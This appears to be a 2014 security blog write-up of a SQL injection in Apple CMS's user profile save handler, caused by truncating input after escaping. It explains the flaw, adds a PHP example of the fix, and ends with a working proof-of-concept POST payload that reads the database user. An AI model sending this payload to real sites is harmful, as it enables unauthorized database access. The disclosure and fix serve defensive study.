Apple CMS (maccms), latest version: SQL injection

Date: 2014-12-3    Author: admin    Category: Technical exchange

In the file /inc/module/user.php:



```php
elseif($method=='save')
{
    chklogin();
    $oldpass = be("post","u_oldpass");
    $password1 = be("post","u_password1");
    $password2 = be("post","u_password2");
    $u_qq= be("post","u_qq");
    $u_email = be("post","u_email");
    $u_phone = be("post","u_phone");
    $u_question = be("post","u_question");
    $u_answer = be("post","u_email");
    if(empty($password1) || empty($u_email)){
        alert ("表单信息不完整,请重填!"); exit;
    }
    // Length limits are applied to the already-escaped values.
    if (strlen($u_email)>32) { $u_email = substring($u_email,32);}
    if (strlen($u_qq)>16) { $u_qq = substring($u_qq,16);}
    if (strlen($u_phone)>16) { $u_phone = substring($u_phone,16);}
    $col = array("u_qq","u_email","u_phone","u_question","u_answer");
    $val = array($u_qq,$u_email,$u_phone,$u_question,$u_answer);
    if ($password1 != ""){
        if ($password1 != $password2){ alert ("两次密码不同");exit; }
        $password1 = md5($password1);
        array_push($col,"u_password");
        array_push($val,$password1);
    }
    // Values are concatenated into the UPDATE statement.
    $db->Update ("{pre}user",$col ,$val ,"u_id=".$user["u_id"]);
    alertUrl ("修改成功!","index.php?m=user-info.html");
}
```


```php
if (strlen($u_email)>32) { $u_email = substring($u_email,32);}
if (strlen($u_qq)>16) { $u_qq = substring($u_qq,16);}
if (strlen($u_phone)>16) { $u_phone = substring($u_phone,16);}
```

These lines truncate the strings. Because the truncation runs after escaping, the escaped sequence `\'` can be cut down to a lone `\`.


The SQL statement executed here:

```sql
UPDATE mac_user SET u_qq='$u_qq',u_email='$u_email',u_phone='$u_phone',u_question='$u_question',u_answer='$u_answer',u_password='$u_password' WHERE u_id=1
```

Here $u_phone is capped at 16 characters. So if we set $u_phone=123456789012345\ , after escaping and then truncating to the first 16 characters, $u_phone keeps exactly its original value, trailing backslash included.


The SQL statement then becomes:

```sql
UPDATE mac_user SET u_qq='$u_qq',u_email='$u_email',u_phone='123456789012345\',u_question='$u_question',u_answer='$u_answer',u_password='$u_password' WHERE u_id=1
```

In other words, the backslash escapes the closing quote, so u_phone is set to the value 123456789012345',u_question= .

Next, setting $u_question to something of the form ,injectsql# is enough to achieve SQL injection.
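To show the ordering defect beside its fix, here is an added example in plain PHP; it is not maccms code. I assume be() escapes input with addslashes() (my stand-in escape_input()), and I replace the CMS's substring() with substr(); escape_then_truncate() mirrors the vulnerable order, truncate_then_escape() the corrected one, and the commented prepared statement removes string concatenation entirely.

```php
<?php
// Added example, not maccms code. Shows why escaping before truncating
// lets a trailing backslash survive and escape the closing SQL quote.

// Stand-in for the escaping be() is assumed to apply on read.
function escape_input(string $s): string {
    return addslashes($s);
}

// Vulnerable order (as in user.php): escape first, then cut to $max bytes.
function escape_then_truncate(string $raw, int $max): string {
    $escaped = escape_input($raw);
    return strlen($escaped) > $max ? substr($escaped, 0, $max) : $escaped;
}

// Fixed order: cut the raw value first, then escape what remains.
function truncate_then_escape(string $raw, int $max): string {
    $cut = strlen($raw) > $max ? substr($raw, 0, $max) : $raw;
    return escape_input($cut);
}

// True when the value ends in an odd run of backslashes, i.e. the quote
// that follows it in the SQL would be escaped away. Useful as a unit test
// or a pre-query sanity check on any escaped-then-limited field.
function has_dangling_backslash(string $v): bool {
    $trailing = strlen($v) - strlen(rtrim($v, '\\'));
    return $trailing % 2 === 1;
}

function build_update(string $phone, string $question): string {
    return "UPDATE mac_user SET u_phone='$phone',u_question='$question' WHERE u_id=1";
}

// Constructed input: 15 digits plus a backslash, exactly the 16-byte limit.
$phone    = '123456789012345\\';
$question = escape_input('my question');

$bad  = escape_then_truncate($phone, 16);   // 16 bytes, still ends in "\"
$good = truncate_then_escape($phone, 16);   // 17 bytes, ends in "\\"
var_dump(has_dangling_backslash($bad));     // bool(true): quote gets eaten
var_dump(has_dangling_backslash($good));    // bool(false): quote intact
echo build_update($bad, $question), "\n";
echo build_update($good, $question), "\n";

// Best fix: bind parameters so the driver separates code from data.
// $stmt = $mysqli->prepare("UPDATE mac_user SET u_phone=?,u_question=? WHERE u_id=?");
// $stmt->bind_param("ssi", $phone, $question, $uid);
```

Run it with `php example.php`; the first UPDATE prints with u_phone's closing quote escaped, the second does not.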


PoC:

URL: maccms/index.php?m=user-save.html (login required)

POST parameters: u_password1=123456&u_password2=123456&u_qq=12345678&u_email=test%40gmail.com&u_phone=123456789012345\&u_question=,u_question=user()%23&u_answer=123456

After sending the request, the "password recovery question" column already displays the current database account.

[Screenshot: BaiduHi_2014-11-12_10-4-12.png]

Tags: sql injection, Apple CMS